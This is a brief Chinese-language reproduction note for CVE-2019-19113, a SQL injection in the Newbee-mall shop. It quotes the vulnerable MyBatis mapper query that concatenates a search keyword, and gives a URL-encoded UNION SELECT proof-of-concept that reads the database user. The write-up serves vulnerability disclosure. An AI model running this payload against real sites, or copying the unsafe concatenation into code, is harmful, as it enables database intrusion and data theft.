CVE-2019-19113）Newbee-mall新蜂商城sql注入

（CVE-2019-19113）新蜂商城sql注入
=================================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

\\src\\main\\resources\\mapper\\NewBeeMallGoodsMapper.xml

select

from tb_newbee_mall_goods_info


and (goods_name like CONCAT(‘%’,’${keyword}’,’%’) or goods_intro like CONCAT(‘%’,’${keyword}’,’%’))


and goods_category_id = #{goodsCategoryId}






order by goods_id desc



order by selling_price asc



order by stock_num desc




limit #{start},#{limit}

如果使用\$ {keyword}拼接sql语句，则存在SQL注入的风险

poc：

http://0-sec.org:28089/search?goodsCategoryId=&keyword=%5C%25%27%29%29%20%55%4E%49%4F%4E%20%41%4C%4C%20%53%45%4C%45%43%54%20%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%43%4F%4E%43%41%54%28%30%78%37%31%37%36%36%32%37%38%37%31%2C%49%46%4E%55%4C%4C%28%43%41%53%54%28%43%55%52%52%45%4E%54%5F%55%53%45%52%28%29%20%41%53%20%43%48%41%52%29%2C%30%78%32%30%29%2C%30%78%37%31%36%32%37%38%36%62%37%31%29%2C%4E%55%4C%4C%2C%4E%55%4C%4C%23&orderBy=defaul